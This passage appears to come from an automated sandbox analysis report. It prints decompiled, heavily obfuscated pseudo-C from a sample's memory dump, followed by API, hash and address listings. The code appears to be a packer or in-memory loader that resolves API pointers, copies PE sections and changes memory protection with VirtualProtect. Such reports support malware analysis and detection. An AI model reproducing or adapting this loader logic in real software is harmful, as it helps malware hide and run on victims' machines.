                                          					_v16 = _t634;
                                          					_t570 = _t568 & 0x00000000 | _t634 ^ _v16 ^ _t427;
                                          					_t637 = _v16;
                                          					if( *(_t500 + 0x4353fa) == 0) {
                                          						_t365 = _t500 + 0x43595c; // 0x43595c
                                          						_t440 =  *((intOrPtr*)(_t500 + 0x44106c))(_t365, _t570);
                                          						_v16 = _t590;
                                          						 *(_t500 + 0x4353fa) =  *(_t500 + 0x4353fa) & 0x00000000;
                                          						 *(_t500 + 0x4353fa) =  *(_t500 + 0x4353fa) ^ (_t590 ^ _v16 | _t440);
                                          						_t590 = _v16;
                                          						_t570 = (_t570 & 0x00000000) +  *_t673;
                                          						_t673 = _t673 - 0xfffffffc;
                                          					}
                                          					_v16 = _t520;
                                          					_t639 = _t637 & 0x00000000 ^ _t520 - _v16 ^ _a8;
                                          					_push( *_t673);
                                          					 *_t673 =  *_t673 - _t570;
                                          					_pop(_t525);
                                          					if( *(_t500 + 0x435984) == 0) {
                                          						_t379 = _t500 + 0x435829; // 0x435829
                                          						_t438 =  *((intOrPtr*)(_t500 + 0x441064))(_t570, _t525);
                                          						 *(_t500 + 0x435984) =  *(_t500 + 0x435984) & 0x00000000;
                                          						 *(_t500 + 0x435984) =  *(_t500 + 0x435984) | _t590 & 0x00000000 | _t438;
                                          						_t590 = _t590;
                                          						_t570 =  *_t673;
                                          						_t673 = _t673 - 0xfffffffc;
                                          						 *_t385 = _t379;
                                          						_t525 = _t525 & 0x00000000 | _v12;
                                          					}
                                          					_t640 = _t639 + _t525;
                                          					_t527 = _t525 & 0x00000000 ^ (_t500 -  *_t673 |  *(_t590 + 8));
                                          					_t503 = _t500;
                                          					if( *(_t503 + 0x43579a) == 0) {
                                          						_t389 = _t503 + 0x4359c1; // 0x4359c1
                                          						_t436 =  *((intOrPtr*)(_t503 + 0x441064))(_t527);
                                          						_v16 = _t527;
                                          						 *(_t503 + 0x43579a) =  *(_t503 + 0x43579a) & 0x00000000;
                                          						 *(_t503 + 0x43579a) =  *(_t503 + 0x43579a) ^ (_t527 & 0x00000000 | _t436);
                                          						 *_t397 = _t389;
                                          						_t570 = _t570 & 0x00000000 | _v12;
                                          						 *_t399 = _t570;
                                          						_t527 = _v20;
                                          					}
                                          					memcpy(_t590, _t640, _t527);
                                          					_t676 =  &(_t673[3]);
                                          					_t592 = _t640 + _t527 + _t527;
                                          					_push(_a8);
                                          					_pop( *_t402);
                                          					_push(_v20);
                                          					_pop(_t641);
                                          					if( *(_t503 + 0x4352b7) == 0) {
                                          						_t405 = _t503 + 0x435237; // 0x435237
                                          						_t434 =  *((intOrPtr*)(_t503 + 0x441068))(_t405, _t570);
                                          						_v20 = _t641;
                                          						 *(_t503 + 0x4352b7) =  *(_t503 + 0x4352b7) & 0x00000000;
                                          						 *(_t503 + 0x4352b7) =  *(_t503 + 0x4352b7) ^ _t641 & 0x00000000 ^ _t434;
                                          						_t641 = _v20;
                                          						_t570 =  *_t676;
                                          						_t676 = _t676 - 0xfffffffc;
                                          					}
                                          					_t677 = _t676 - 0xfffffffc;
                                          					_push(0 ^  *_t676);
                                          					 *_t677 =  *_t677 - _t570;
                                          					_pop(_t531);
                                          					_t429 = memcpy(_t592, _t641, _t531);
                                          					_t678 = _t677 + 0xc;
                                          					 *_t414 = _t429;
                                          					_t629 =  *_t678;
                                          					_t425 = memcpy(_t641 + _t531 + _t531 & 0x00000000 | _t429 ^  *_t678 | _a8, _t629, 0);
                                          					_t673 =  &(_t678[4]);
                                          					_t587 = _t629 + (0 | _v12) + (0 | _v12);
                                          				}
                                          				return _t425;
                                          			}

                                          APIs
                                          • OleInitialize.OLE32(?,?,?,00000000,00000000), ref: 001A3811
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.635169240.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_1a0000_regsvr32.jbxd
                                          Similarity
                                          • API ID: Initialize
                                          • String ID:
                                          • API String ID: 2538663250-0
                                          • Opcode ID: c37222093e77ab49d6deb27a8b81837918c5f5959dbe1409ced66bdcc0807996
                                          • Instruction ID: 1b7a3d79ee8654774c852d7b10d04e5d319d2e145cb1ce72ac68a1f3e3b38706
                                          • Opcode Fuzzy Hash: c37222093e77ab49d6deb27a8b81837918c5f5959dbe1409ced66bdcc0807996
                                          • Instruction Fuzzy Hash: 63624D72800604EFFF049FA0C889B9A7BB5FF24325F0851A9ED5D9E09AD77415A4CF68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 67%
                                          			E001A242A(signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi, signed int _a4, char _a36, char _a244) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _t337;
                                          				signed int _t339;
                                          				void* _t346;
                                          				void* _t347;
                                          				signed int _t348;
                                          				signed int _t350;
                                          				signed int _t351;
                                          				signed int _t357;
                                          				signed int _t358;
                                          				signed int _t361;
                                          				void* _t364;
                                          				void* _t365;
                                          				signed int _t366;
                                          				signed int _t368;
                                          				signed int _t371;
                                          				signed int _t374;
                                          				signed int _t377;
                                          				signed int _t379;
                                          				signed int _t380;
                                          				signed int _t382;
                                          				signed int _t384;
                                          				signed int _t388;
                                          				signed int _t391;
                                          				signed int _t392;
                                          				signed int _t394;
                                          				signed int _t397;
                                          				signed int _t398;
                                          				signed int _t400;
                                          				signed int _t404;
                                          				signed int _t405;
                                          				signed int _t408;
                                          				signed int _t409;
                                          				signed int _t413;
                                          				signed int _t415;
                                          				signed int _t417;
                                          				signed int _t420;
                                          				signed int _t423;
                                          				signed int _t428;
                                          				signed int _t431;
                                          				signed int _t433;
                                          				signed int _t454;
                                          				signed int _t457;
                                          				signed int _t479;
                                          				signed int _t481;
                                          				signed int _t484;
                                          				void* _t486;
                                          				signed int _t489;
                                          				void* _t492;
                                          				signed int _t500;
                                          				signed int _t503;
                                          				void* _t516;
                                          				signed int _t523;
                                          				signed int _t526;
                                          				signed int _t529;
                                          				void* _t531;
                                          				signed int _t562;
                                          				void* _t565;
                                          				void* _t568;
                                          				signed int* _t571;
                                          				signed int* _t572;
                                          				signed int* _t574;
                                          				signed int* _t575;
                                          
                                          				_t523 = __esi;
                                          				_t479 = __edi;
                                          				_t450 = __edx;
                                          				_t426 = __ecx;
                                          				_t417 = __ebx;
                                          				if( *(__ebx + 0x4351c7) == 0) {
                                          					_push(__ecx);
                                          					_push(__edx);
                                          					_push(__ebx + 0x4351ef);
                                          					_t337 =  *((intOrPtr*)(__ebx + 0x44106c))();
                                          					_v12 = __edx;
                                          					 *(__ebx + 0x4351c7) =  *(__ebx + 0x4351c7) & 0x00000000;
                                          					 *(__ebx + 0x4351c7) =  *(__ebx + 0x4351c7) | __edx ^ _v12 | _t337;
                                          					_pop( *_t11);
                                          					_t450 = _v12 & 0x00000000 ^ _v12;
                                          					_pop( *_t13);
                                          					_t426 = __ecx & 0x00000000 | _v12;
                                          				}
                                          				if( *(_t417 + 0x4352b0) == 0) {
                                          					_push(_t426);
                                          					_push(_t450);
                                          					if( *(_t417 + 0x4355c5) == 0) {
                                          						_t415 =  *((intOrPtr*)(_t417 + 0x4410a8))(0,  *((intOrPtr*)(_t417 + 0x435914)));
                                          						_v12 = _t523;
                                          						 *(_t417 + 0x4355c5) =  *(_t417 + 0x4355c5) & 0x00000000;
                                          						 *(_t417 + 0x4355c5) =  *(_t417 + 0x4355c5) | _t523 - _v12 | _t415;
                                          						_t523 = _v12;
                                          					}
                                          					_t337 =  *((intOrPtr*)(_t417 + 0x441064))(_t417 + 0x4359f9);
                                          					if( *(_t417 + 0x43523f) == 0) {
                                          						_t413 =  *((intOrPtr*)(_t417 + 0x441060))(_t337);
                                          						 *(_t417 + 0x43523f) =  *(_t417 + 0x43523f) & 0x00000000;
                                          						 *(_t417 + 0x43523f) =  *(_t417 + 0x43523f) | _t479 -  *_t571 | _t413;
                                          						_t479 = _t479;
                                          						_t337 =  *_t571;
                                          						_t571 =  &(_t571[1]);
                                          					}
                                          					 *(_t417 + 0x4352b0) =  *(_t417 + 0x4352b0) & 0x00000000;
                                          					 *(_t417 + 0x4352b0) =  *(_t417 + 0x4352b0) | _t523 ^  *_t571 | _t337;
                                          					_t523 = _t523;
                                          					if( *(_t417 + 0x4351b3) == 0) {
                                          						_t337 =  *((intOrPtr*)(_t417 + 0x4410a8))( *((intOrPtr*)(_t417 + 0x435978)),  *((intOrPtr*)(_t417 + 0x4356a9)));
                                          						_push(_t426);
                                          						 *(_t417 + 0x4351b3) =  *(_t417 + 0x4351b3) & 0x00000000;
                                          						 *(_t417 + 0x4351b3) =  *(_t417 + 0x4351b3) ^ (_t426 & 0x00000000 | _t337);
                                          					}
                                          					_pop( *_t46);
                                          					_t450 = _v12;
                                          					_t426 =  *_t571;
                                          					_t571 =  &(_t571[1]);
                                          					if( *(_t417 + 0x4353c2) == 0) {
                                          						_t337 =  *((intOrPtr*)(_t417 + 0x441068))(_t417 + 0x4352a8, _t450, _t426);
                                          						_v12 = _t479;
                                          						 *(_t417 + 0x4353c2) =  *(_t417 + 0x4353c2) & 0x00000000;
                                          						 *(_t417 + 0x4353c2) =  *(_t417 + 0x4353c2) | _t479 - _v12 | _t337;
                                          						_t479 = _v12;
                                          						_t450 =  *_t571;
                                          						_t575 =  &(_t571[1]);
                                          						_t426 =  *_t575;
                                          						_t571 = _t575 - 0xfffffffc;
                                          					}
                                          				}
                                          				_push(_t450);
                                          				_push(_t426);
                                          				_t339 = _t337 & 0x00000000 ^ (_t523 ^  *_t571 | _a4);
                                          				_t526 = _t523;
                                          				if( *(_t417 + 0x43524c) == 0) {
                                          					_t409 =  *((intOrPtr*)(_t417 + 0x44105c))();
                                          					_v12 = _t450;
                                          					 *(_t417 + 0x43524c) =  *(_t417 + 0x43524c) & 0x00000000;
                                          					 *(_t417 + 0x43524c) =  *(_t417 + 0x43524c) ^ (_t450 & 0x00000000 | _t409);
                                          					_t450 = _v12;
                                          					 *_t67 = _t339;
                                          					_t339 = 0 + _v12;
                                          				}
                                          				if( *(_t417 + 0x43539a) == 0) {
                                          					_t404 =  *((intOrPtr*)(_t417 + 0x441044))(_t417 + 0x435020, _t417 + 0x435a31, _t339);
                                          					 *(_t417 + 0x43517e) =  *(_t417 + 0x43517e) & 0x00000000;
                                          					 *(_t417 + 0x43517e) =  *(_t417 + 0x43517e) ^ (_t479 & 0x00000000 | _t404);
                                          					_t516 = _t479;
                                          					_t405 =  *((intOrPtr*)(_t417 + 0x441060))();
                                          					 *(_t417 + 0x43539a) =  *(_t417 + 0x43539a) & 0x00000000;
                                          					 *(_t417 + 0x43539a) =  *(_t417 + 0x43539a) | _t516 -  *_t571 ^ _t405;
                                          					_t479 = _t516;
                                          					if( *(_t417 + 0x4355b1) == 0) {
                                          						_t408 =  *((intOrPtr*)(_t417 + 0x441068))(_t417 + 0x435068);
                                          						 *(_t417 + 0x4355b1) =  *(_t417 + 0x4355b1) & 0x00000000;
                                          						 *(_t417 + 0x4355b1) =  *(_t417 + 0x4355b1) ^ (_t426 ^  *_t571 | _t408);
                                          						_t426 = _t426;
                                          					}
                                          					_t339 =  *_t571;
                                          					_t571 = _t571 - 0xfffffffc;
                                          				}
                                          				 *_t93 =  *((intOrPtr*)(_t417 + 0x441044))(_t417 + 0x435669, _t417 + 0x4350e8, _t339 +  *((intOrPtr*)(_t339 + 0x3c)));
                                          				_push(_v12);
                                          				_pop( *_t95);
                                          				_t572 = _t571 - 0xfffffffc;
                                          				_push(0 ^  *_t571);
                                          				_t346 = _t417 + 0x43517b;
                                          				if( *(_t417 + 0x43525c) == 0) {
                                          					_t400 =  *((intOrPtr*)(_t417 + 0x4410a8))( *((intOrPtr*)(_t417 + 0x4352d7)),  *((intOrPtr*)(_t417 + 0x43563d)), _t346);
                                          					_v12 = _t450;
                                          					 *(_t417 + 0x43525c) =  *(_t417 + 0x43525c) & 0x00000000;
                                          					 *(_t417 + 0x43525c) =  *(_t417 + 0x43525c) ^ (_t450 - _v12 | _t400);
                                          					_t450 = _v12;
                                          					_t346 = (_t400 & 0x00000000) +  *_t572;
                                          					_t572 = _t572 - 0xfffffffc;
                                          				}
                                          				_push(_t346);
                                          				_t347 = _t417 + 0x435162;
                                          				if( *(_t417 + 0x4357ee) == 0) {
                                          					_t398 =  *((intOrPtr*)(_t417 + 0x441060))();
                                          					_v12 = _t479;
                                          					 *(_t417 + 0x4357ee) =  *(_t417 + 0x4357ee) & 0x00000000;
                                          					 *(_t417 + 0x4357ee) =  *(_t417 + 0x4357ee) ^ _t479 - _v12 ^ _t398;
                                          					_t479 = _v12;
                                          					 *_t118 = _t347;
                                          					_t347 = 0 + _v12;
                                          				}
                                          				_t348 =  *((intOrPtr*)(_t417 + 0x441044))();
                                          				_v12 = _t526;
                                          				 *(_t417 + 0x43516b) =  *(_t417 + 0x43516b) & 0x00000000;
                                          				 *(_t417 + 0x43516b) =  *(_t417 + 0x43516b) | _t526 - _v12 ^ _t348;
                                          				_t529 = _v12;
                                          				 *_t128 = _t347;
                                          				_t350 = 0 + _v12;
                                          				if( *(_t417 + 0x4357de) == 0) {
                                          					_t397 =  *((intOrPtr*)(_t417 + 0x441068))(_t417 + 0x4350d4, _t350);
                                          					 *(_t417 + 0x4357de) =  *(_t417 + 0x4357de) & 0x00000000;
                                          					 *(_t417 + 0x4357de) =  *(_t417 + 0x4357de) | _t450 -  *_t572 ^ _t397;
                                          					_t450 = _t450;
                                          					_pop( *_t137);
                                          					_t350 = _v12;
                                          				}
                                          				_push(_t350);
                                          				_v12 = _t450;
                                          				_t481 = _t479 & 0x00000000 ^ (_t450 ^ _v12 | _t350);
                                          				_t351 =  *(_t481 + 6) & 0x0000ffff;
                                          				if( *(_t417 + 0x435579) == 0) {
                                          					_t394 =  *((intOrPtr*)(_t417 + 0x4410a4))( *((intOrPtr*)(_t417 + 0x4352a4)), _t351);
                                          					 *_t572 = _t529;
                                          					 *(_t417 + 0x435579) = 0 ^ _t394;
                                          					_t529 = 0;
                                          					_t351 = 0 ^  *_t572;
                                          					_t572 =  &(_t572[1]);
                                          				}
                                          				if( *((intOrPtr*)(_t417 + 0x435575)) == 0) {
                                          					if( *(_t417 + 0x43534a) == 0) {
                                          						_t392 =  *((intOrPtr*)(_t417 + 0x441060))(_t351);
                                          						 *(_t417 + 0x43534a) =  *(_t417 + 0x43534a) & 0x00000000;
                                          						 *(_t417 + 0x43534a) =  *(_t417 + 0x43534a) | _t529 -  *_t572 | _t392;
                                          						_t529 = _t529;
                                          						_t351 =  *_t572;
                                          						_t572 = _t572 - 0xfffffffc;
                                          					}
                                          					_push(_t351);
                                          					_push(_t417 + 0x43573a);
                                          					if( *(_t417 + 0x43580e) == 0) {
                                          						_t391 =  *((intOrPtr*)(_t417 + 0x441068))(_t417 + 0x43505c);
                                          						_v12 = _t529;
                                          						 *(_t417 + 0x43580e) =  *(_t417 + 0x43580e) & 0x00000000;
                                          						 *(_t417 + 0x43580e) =  *(_t417 + 0x43580e) | _t529 & 0x00000000 | _t391;
                                          						_t529 = _v12;
                                          					}
                                          					_t384 =  *((intOrPtr*)(_t417 + 0x441054))();
                                          					if( *(_t417 + 0x435555) == 0) {
                                          						_t388 =  *((intOrPtr*)(_t417 + 0x441060))(_t384);
                                          						 *(_t417 + 0x435555) =  *(_t417 + 0x435555) & 0x00000000;
                                          						 *(_t417 + 0x435555) =  *(_t417 + 0x435555) ^ _t426 ^  *_t572 ^ _t388;
                                          						_t426 = _t426;
                                          						_t384 = _t388 & 0x00000000 |  *_t572;
                                          						_t572 = _t572 - 0xfffffffc;
                                          					}
                                          					 *_t171 = _t384;
                                          					_push(_v12);
                                          					_pop( *_t173);
                                          					if( *((intOrPtr*)(_t417 + 0x435716)) == 0) {
                                          						 *_t177 =  *((intOrPtr*)(_t417 + 0x44106c))(_t417 + 0x4358e4);
                                          						_push(_v12);
                                          						_pop( *_t179);
                                          					}
                                          					_pop( *_t180);
                                          					_t351 = 0 + _v12;
                                          				}
                                          				_v12 = _t481;
                                          				_v8 = _v8 & 0x00000000;
                                          				_v8 = _v8 ^ (_t481 ^ _v12 | _t351);
                                          				_t484 = _v12;
                                          				if( *(_t417 + 0x43577a) == 0) {
                                          					_t351 =  *((intOrPtr*)(_t417 + 0x4410a8))(0,  *((intOrPtr*)(_t417 + 0x4351e3)));
                                          					 *_t572 = _t484;
                                          					 *(_t417 + 0x43577a) = _t351;
                                          					_t484 = 0;
                                          				}
                                          				_push(_t484);
                                          				if( *(_t417 + 0x435008) == 0) {
                                          					_t351 =  *((intOrPtr*)(_t417 + 0x441058))();
                                          					 *(_t417 + 0x435008) =  *(_t417 + 0x435008) & 0x00000000;
                                          					 *(_t417 + 0x435008) =  *(_t417 + 0x435008) | _t529 & 0x00000000 ^ _t351;
                                          					_t529 = _t529;
                                          				}
                                          				 *_t572 = _t417;
                                          				_t454 = 0 ^  *(_t484 + 0x54);
                                          				_t420 = 0;
                                          				_v12 = _t351;
                                          				_t486 = _t484 & 0x00000000 ^ (_t351 - _v12 |  *(_t420 + 0x4350b0));
                                          				if( *(_t420 + 0x435156) == 0) {
                                          					_t205 = _t420 + 0x435900; // 0x435900
                                          					_t382 =  *((intOrPtr*)(_t420 + 0x44106c))(_t205, _t454);
                                          					_v12 = _t486;
                                          					 *(_t420 + 0x435156) =  *(_t420 + 0x435156) & 0x00000000;
                                          					 *(_t420 + 0x435156) =  *(_t420 + 0x435156) | _t486 ^ _v12 | _t382;
                                          					_t486 = _v12;
                                          					_t454 =  *_t572;
                                          					_t572 =  &(_t572[1]);
                                          				}
                                          				_t531 = _t529 & 0x00000000 | _t420 & 0x00000000 ^ _a4;
                                          				_t423 = _t420;
                                          				_t428 = _t426 & 0x00000000 ^ (_t562 & 0x00000000 | _t454);
                                          				_t565 = _t562;
                                          				if(_t486 == _t531) {
                                          					L50:
                                          					_pop( *_t258);
                                          					if( *(_t423 + 0x4354c6) == 0) {
                                          						_t371 =  *((intOrPtr*)(_t423 + 0x441058))();
                                          						_v12 = _t531;
                                          						 *(_t423 + 0x4354c6) =  *(_t423 + 0x4354c6) & 0x00000000;
                                          						 *(_t423 + 0x4354c6) =  *(_t423 + 0x4354c6) ^ _t531 ^ _v12 ^ _t371;
                                          						_t531 = _v12;
                                          					}
                                          					_t489 =  &_a244;
                                          					_t568 = _t565;
                                          					do {
                                          						_t431 = _t428;
                                          						_v12 = _t423;
                                          						_t433 = _t431 & 0x00000000 | _t423 & 0x00000000 ^  *(_t489 + 0x10);
                                          						_t423 = _v12;
                                          						_t273 = _t423 + 0x4350ed; // 0x4350ed
                                          						_t274 = _t423 + 0x43585d; // 0x43585d
                                          						_t357 =  *((intOrPtr*)(_t423 + 0x441044))(_t274, _t273, _t433, _t489);
                                          						 *(_t423 + 0x435294) =  *(_t423 + 0x435294) & 0x00000000;
                                          						 *(_t423 + 0x435294) =  *(_t423 + 0x435294) | _t489 & 0x00000000 ^ _t357;
                                          						_t492 = _t489;
                                          						_t531 = (_t531 & 0x00000000 | _t428 & 0x00000000 | _a4) +  *((intOrPtr*)(_t492 + 0x14));
                                          						_t358 = memcpy( *((intOrPtr*)(_t492 + 0xc)) +  *(_t423 + 0x4350b0), _t531, _t433 & 0x00000000 |  *_t572);
                                          						_t572 =  &((_t572 - 0xfffffffc)[3]);
                                          						_t428 = 0;
                                          						if( *(_t423 + 0x435944) == 0) {
                                          							_t284 = _t423 + 0x435a21; // 0x435a21
                                          							_t358 =  *((intOrPtr*)(_t423 + 0x441054))(_t284);
                                          							_v12 = _t531;
                                          							 *(_t423 + 0x435944) = 0 ^ _t358;
                                          							_t531 = _v12;
                                          						}
                                          						_pop( *_t289);
                                          						_t489 =  &_a36;
                                          						_t568 = _t568;
                                          						if( *(_t423 + 0x4356c1) == 0) {
                                          							_t358 =  *((intOrPtr*)(_t423 + 0x4410a4))(1);
                                          							_v12 = _t531;
                                          							 *(_t423 + 0x4356c1) = _t358;
                                          							_t531 = _v12;
                                          						}
                                          						_t296 =  &_v8;
                                          						 *_t296 = _v8 - 1;
                                          					} while ( *_t296 != 0);
                                          					if( *(_t423 + 0x435018) == 0) {
                                          						_t358 =  *((intOrPtr*)(_t423 + 0x4410a8))( *((intOrPtr*)(_t423 + 0x43549a)), 9);
                                          						_push(0);
                                          						 *_t572 = _t489;
                                          						 *(_t423 + 0x435018) = 0 ^ _t358;
                                          					}
                                          					_t500 =  *_t572;
                                          					_t574 = _t572 - 0xfffffffc;
                                          					_v12 = _t454;
                                          					_t457 = _v12;
                                          					_t361 = (_t358 & 0x00000000 ^ _t454 ^ _v12 ^  *(_t500 + 0x28)) +  *(_t423 + 0x4350b0);
                                          					if( *(_t423 + 0x435376) == 0) {
                                          						_t308 = _t423 + 0x435524; // 0x435524
                                          						_t368 =  *((intOrPtr*)(_t423 + 0x44106c))(_t361);
                                          						_v12 = _t531;
                                          						 *(_t423 + 0x435376) =  *(_t423 + 0x435376) & 0x00000000;
                                          						 *(_t423 + 0x435376) =  *(_t423 + 0x435376) | _t531 ^ _v12 | _t368;
                                          						_t531 = _v12;
                                          						 *_t317 = _t308;
                                          						_t361 = _t368 & 0x00000000 ^ _v12;
                                          					}
                                          					_v12 = _t500;
                                          					 *(_t423 + 0x4351a7) =  *(_t423 + 0x4351a7) & 0x00000000;
                                          					 *(_t423 + 0x4351a7) =  *(_t423 + 0x4351a7) | _t500 ^ _v12 ^ _t361;
                                          					_t503 = _v12;
                                          					_t535 = _t531 & 0x00000000 ^ (_t361 & 0x00000000 |  *(_t423 + 0x4350b0));
                                          					_t364 = _t361;
                                          					if((_t531 & 0x00000000 ^ (_t361 & 0x00000000 |  *(_t423 + 0x4350b0))) > 0) {
                                          						if( *(_t423 + 0x43536e) == 0) {
                                          							_t366 =  *((intOrPtr*)(_t423 + 0x441070))(0);
                                          							 *(_t423 + 0x43536e) =  *(_t423 + 0x43536e) & 0x00000000;
                                          							 *(_t423 + 0x43536e) =  *(_t423 + 0x43536e) | _t457 ^  *_t574 | _t366;
                                          							_t457 = _t457;
                                          						}
                                          						_t365 = E001A2C41(_t423, _t428, _t457, _t503, _t535, _t535); // executed
                                          						_t364 = E001A34DA(_t365, _t423, _t428, _t457, _t503, _t535, _t535);
                                          					}
                                          					_pop( *_t333);
                                          					_pop( *_t335);
                                          					return _t364;
                                          				} else {
                                          					if( *(_t423 + 0x435004) == 0) {
                                          						_t380 =  *((intOrPtr*)(_t423 + 0x4410a8))( *((intOrPtr*)(_t423 + 0x4352fb)),  *((intOrPtr*)(_t423 + 0x4354e6)), _t454, _t428);
                                          						_v12 = _t454;
                                          						 *(_t423 + 0x435004) =  *(_t423 + 0x435004) & 0x00000000;
                                          						 *(_t423 + 0x435004) =  *(_t423 + 0x435004) ^ _t454 & 0x00000000 ^ _t380;
                                          						_pop( *_t225);
                                          						_t454 = _v12;
                                          						_pop( *_t227);
                                          						_t428 = _v12 + (_t428 & 0x00000000);
                                          					}
                                          					do {
                                          						asm("movsb");
                                          						_t428 = _t428 - 1;
                                          					} while (_t428 != 0);
                                          					if( *(_t423 + 0x4359f5) == 0) {
                                          						_t230 = _t423 + 0x4356a1; // 0x4356a1
                                          						_t379 =  *((intOrPtr*)(_t423 + 0x441068))(_t230, _t454);
                                          						_v12 = _t531;
                                          						 *(_t423 + 0x4359f5) =  *(_t423 + 0x4359f5) & 0x00000000;
                                          						 *(_t423 + 0x4359f5) =  *(_t423 + 0x4359f5) ^ _t531 - _v12 ^ _t379;
                                          						_t531 = _v12;
                                          						_t454 = _t454 & 0x00000000 |  *_t572;
                                          						_t572 = _t572 - 0xfffffffc;
                                          					}
                                          					_t486 = _t486 & 0x00000000 ^ (_t428 -  *_t572 |  *(_t423 + 0x4350b0));
                                          					_t428 = _t428;
                                          					 *((intOrPtr*)(_t423 + 0x4354d2)) = 0x40;
                                          					_t241 = _t423 + 0x4356e5; // 0x4356e5
                                          					_t242 = _t423 + 0x4352b4; // 0x4352b4
                                          					_t374 =  *((intOrPtr*)(_t423 + 0x441044))(_t242, _t241, _t454);
                                          					 *(_t423 + 0x4351cb) =  *(_t423 + 0x4351cb) & 0x00000000;
                                          					 *(_t423 + 0x4351cb) =  *(_t423 + 0x4351cb) | _t531 ^  *_t572 ^ _t374;
                                          					_t531 = _t531;
                                          					_t454 =  *_t572;
                                          					_t572 = _t572 - 0xfffffffc;
                                          					_t248 = _t423 + 0x4354d2; // 0x4354d2
                                          					_push(2);
                                          					_push(_t454);
                                          					if( *(_t423 + 0x435010) == 0) {
                                          						_t377 =  *((intOrPtr*)(_t423 + 0x441058))();
                                          						_v12 = _t531;
                                          						 *(_t423 + 0x435010) =  *(_t423 + 0x435010) & 0x00000000;
                                          						 *(_t423 + 0x435010) =  *(_t423 + 0x435010) ^ _t531 & 0x00000000 ^ _t377;
                                          						_t531 = _v12;
                                          					}
                                          					VirtualProtect(_t486, ??, ??, ??);
                                          					goto L50;
                                          				}
                                          			}



































































                                          0x001a2627
                                          0x001a262e
                                          0x001a2634
                                          0x001a2634
                                          0x001a2637
                                          0x001a263a
                                          0x001a263a
                                          0x001a2656
                                          0x001a2659
                                          0x001a265c
                                          0x001a2667
                                          0x001a266a
                                          0x001a266b
                                          0x001a2678
                                          0x001a2687
                                          0x001a268d
                                          0x001a2695
                                          0x001a269c
                                          0x001a26a2
                                          0x001a26ab
                                          0x001a26ae
                                          0x001a26ae
                                          0x001a26b1
                                          0x001a26b2
                                          0x001a26bf
                                          0x001a26c2
                                          0x001a26c8
                                          0x001a26d0
                                          0x001a26d7
                                          0x001a26dd
                                          0x001a26e2
                                          0x001a26e5
                                          0x001a26e5
                                          0x001a26e9
                                          0x001a26ef
                                          0x001a26f7
                                          0x001a26fe
                                          0x001a2704
                                          0x001a2709
                                          0x001a270c
                                          0x001a2716
                                          0x001a2720
                                          0x001a272c
                                          0x001a2733
                                          0x001a2739
                                          0x001a273a
                                          0x001a273d
                                          0x001a273d
                                          0x001a2740
                                          0x001a2741
                                          0x001a274c
                                          0x001a2751
                                          0x001a275c
                                          0x001a2765
                                          0x001a276d
                                          0x001a2774
                                          0x001a277a
                                          0x001a277d
                                          0x001a2780
                                          0x001a2780
                                          0x001a278a
                                          0x001a2797
                                          0x001a279a
                                          0x001a27a6
                                          0x001a27ad
                                          0x001a27b3
                                          0x001a27ba
                                          0x001a27bd
                                          0x001a27bd
                                          0x001a27c0
                                          0x001a27c7
                                          0x001a27cf
                                          0x001a27d8
                                          0x001a27de
                                          0x001a27e6
                                          0x001a27ed
                                          0x001a27f3
                                          0x001a27f3
                                          0x001a27f6
                                          0x001a2803
                                          0x001a2806
                                          0x001a2812
                                          0x001a2819
                                          0x001a281f
                                          0x001a2826
                                          0x001a2829
                                          0x001a2829
                                          0x001a282d
                                          0x001a2830
                                          0x001a2833
                                          0x001a2840
                                          0x001a2850
                                          0x001a2853
                                          0x001a2856
                                          0x001a2856
                                          0x001a285e
                                          0x001a2861
                                          0x001a2861
                                          0x001a2864
                                          0x001a286c
                                          0x001a2870
                                          0x001a2873
                                          0x001a287d
                                          0x001a2887
                                          0x001a288f
                                          0x001a2896
                                          0x001a289c
                                          0x001a289c
                                          0x001a289d
                                          0x001a28a5
                                          0x001a28a7
                                          0x001a28b3
                                          0x001a28ba
                                          0x001a28c0
                                          0x001a28c0
                                          0x001a28c3
                                          0x001a28cb
                                          0x001a28cd
                                          0x001a28ce
                                          0x001a28dd
                                          0x001a28e9
                                          0x001a28ec
                                          0x001a28f3
                                          0x001a28f9
                                          0x001a2901
                                          0x001a2908
                                          0x001a290e
                                          0x001a2913
                                          0x001a2916
                                          0x001a2916
                                          0x001a2923
                                          0x001a2925
                                          0x001a292f
                                          0x001a2931
                                          0x001a2934
                                          0x001a2a43
                                          0x001a2a49
                                          0x001a2a56
                                          0x001a2a58
                                          0x001a2a5e
                                          0x001a2a66
                                          0x001a2a6d
                                          0x001a2a73
                                          0x001a2a73
                                          0x001a2a7f
                                          0x001a2a81
                                          0x001a2a82
                                          0x001a2a8f
                                          0x001a2a90
                                          0x001a2a9c
                                          0x001a2a9e
                                          0x001a2aa2
                                          0x001a2aa9
                                          0x001a2ab0
                                          0x001a2abc
                                          0x001a2ac3
                                          0x001a2ac9
                                          0x001a2ad6
                                          0x001a2ae2
                                          0x001a2ae2
                                          0x001a2ae2
                                          0x001a2aeb
                                          0x001a2aed
                                          0x001a2af4
                                          0x001a2afa
                                          0x001a2b01
                                          0x001a2b07
                                          0x001a2b07
                                          0x001a2b10
                                          0x001a2b1f
                                          0x001a2b21
                                          0x001a2b29
                                          0x001a2b2d
                                          0x001a2b33
                                          0x001a2b3a
                                          0x001a2b40
                                          0x001a2b40
                                          0x001a2b43
                                          0x001a2b43
                                          0x001a2b43
                                          0x001a2b53
                                          0x001a2b5d
                                          0x001a2b63
                                          0x001a2b65
                                          0x001a2b6c
                                          0x001a2b72
                                          0x001a2b75
                                          0x001a2b78
                                          0x001a2b7b
                                          0x001a2b89
                                          0x001a2b8c
                                          0x001a2b99
                                          0x001a2b9c
                                          0x001a2ba3
                                          0x001a2ba9
                                          0x001a2bb1
                                          0x001a2bb8
                                          0x001a2bbe
                                          0x001a2bc7
                                          0x001a2bca
                                          0x001a2bca
                                          0x001a2bcd
                                          0x001a2bd5
                                          0x001a2bdc
                                          0x001a2be2
                                          0x001a2bf2
                                          0x001a2bf4
                                          0x001a2bf8
                                          0x001a2c01
                                          0x001a2c05
                                          0x001a2c11
                                          0x001a2c18
                                          0x001a2c1e
                                          0x001a2c1e
                                          0x001a2c20
                                          0x001a2c26
                                          0x001a2c26
                                          0x001a2c2b
                                          0x001a2c37
                                          0x001a2c3e
                                          0x001a293a
